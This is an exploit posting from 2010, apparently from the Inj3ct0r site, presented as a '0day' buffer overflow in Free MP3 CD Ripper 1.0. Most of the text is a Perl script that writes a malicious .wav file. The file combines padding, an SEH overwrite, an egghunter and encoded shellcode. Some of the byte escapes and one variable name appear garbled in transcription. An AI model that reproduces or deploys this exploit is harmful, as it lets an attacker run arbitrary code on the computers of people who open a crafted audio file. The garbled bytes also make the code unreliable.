Free MP3 CD Ripper 1.0 (0day) local buffer over flow
Posted on 27 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Free MP3 CD Ripper 1.0 (0day) local buffer over flow </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Free MP3 CD Ripper 1.0 (0day) local buffer over flow ==================================================== ########################################################################### #Exploit Title : Free MP3 CD Ripper 1.0 (0day) #download : http://free-mp3-cd-ripper.en.softonic.com/download #tested on windows xp SP 3 FR #Author: MadjiX - Dz8[at]hotmail[dot]com #Special Greets: Bibi-info , His0k4 ########################################################################### my $file= "MadjiX.wav"; my $junk= "x41" x 3964 ; my $junk2="x41" x 2189 ; my $ma7a= "x57x30x30x54". "x57x30x30x54"; my $nseh= "xebx06x90x90"; my $seh = "x7Fx27xE4x66"; my $ht? = "x66x81xCAxFF". "x0Fx42x52x6A". "x02x58xCDx2E". "x3Cx05x5Ax74". "xEFxB8x57x30". "x30x54x8BxFA". "xAFx75xEAxAF". "x75xE7xFFxE7"; my $shel= "xdbxc0x31xc9". "xbfx7cx16x70". "xccxd9x74x24". "xf4xb1x1ex58". "x31x78x18x83". "xe8xfcx03x78". "x68xf4x85x30". "x78xbcx65xc9". "x78xb6x23xf5". "xf3xb4xaex7d". "x02xaax3ax32". "x1cxbfx62xed". "x1dx54xd5x66". "x29x21xe7x96". "x60xf5x71xca". "x06x35xf5x14". "xc7x7cxfbx1b". "x05x6bxf0x27". "xddx48xfdx22". "x38x1bxa2xe8". "xc3xf7x3bx7a". "xcfx4cx4fx23". "xd3x53xa4x57". "xf7xd8x3bx83". "x8ex83x1fx57". "x53x64x51xa1". "x33xcdxf5xc6". "xf5xc1x7ex98". "xf5xaaxf1x05". "xa8x26x99x3d". "x3bxc0xd9xfe". "x51x61xb6x0e". "x2fx85x19x87". "xb7x78x2fx59". "x90x7bxd7x05". "x7fxe8x7bxca"; open($FILE,">$file"); print $FILE $ma7a.$shel.$junk.$nseh.$seh.$ht.$junk2 ; close($FILE); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>